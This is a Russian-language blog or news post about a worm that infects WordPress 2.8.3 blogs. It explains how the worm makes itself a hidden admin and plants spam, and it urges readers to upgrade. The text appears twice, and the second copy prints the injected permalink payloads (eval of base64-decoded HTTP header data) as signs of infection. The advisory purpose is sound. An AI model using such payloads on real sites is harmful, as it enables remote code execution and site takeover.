Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. Сразу же вышел WordPress 2.8.4, устраняющий эту уязвимость. Как оказалось, далеко не все блогеры следят за апдейтами.
В этот уикенд разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы юзеров и начинает втихую добавлять спам и ссылки на вредоносный контент в архивные топики.
Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.
или
или ошибки
Если есть такой код или фид сломан, то блог инфицирован.
Процедура удаления червя представляет собой нетривиальную задачу.
Кстати, Мэтт Мюлленвег разродился большой статьёй на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот инструкция по апгрейду WordPress. Это единственный способ обезопасить себя от этой и будущих эпидемий.
В этот уикенд разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы юзеров и начинает втихую добавлять спам и ссылки на вредоносный контент в архивные топики.
Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
или ошибки
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’
Если есть такой код или фид сломан, то блог инфицирован.
Процедура удаления червя представляет собой нетривиальную задачу.
Кстати, Мэтт Мюлленвег разродился большой статьёй на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот инструкция по апгрейду WordPress. Это единственный способ обезопасить себя от этой и будущих эпидемий.